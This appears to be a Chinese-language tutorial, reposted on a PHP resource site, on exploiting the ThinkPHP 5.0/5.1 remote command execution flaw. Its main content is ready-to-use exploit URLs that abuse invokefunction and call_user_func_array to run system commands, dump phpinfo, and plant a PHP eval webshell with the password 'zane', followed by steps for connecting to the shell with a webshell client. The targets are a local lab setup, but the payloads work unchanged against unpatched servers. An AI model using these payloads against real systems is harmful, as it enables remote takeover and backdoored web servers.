Rumah > rangka kerja php > ThinkPHP > 关于ThinkPHP漏洞利用

关于ThinkPHP漏洞利用

藏色散人
Lepaskan: 2020-08-31 13:37:53
ke hadapan
2997 orang telah melayarinya

下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!

关于ThinkPHP漏洞利用

thinkphp_5x_命令执行漏洞

受影响版本包括5.0和5.1版本

docker漏洞环境源码:
https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函数远程命令执行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

写入shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
Salin selepas log masuk

使用菜刀连接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php   密码为zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php        密码为zane
`

Atas ialah kandungan terperinci 关于ThinkPHP漏洞利用. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:cnblogs.com
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan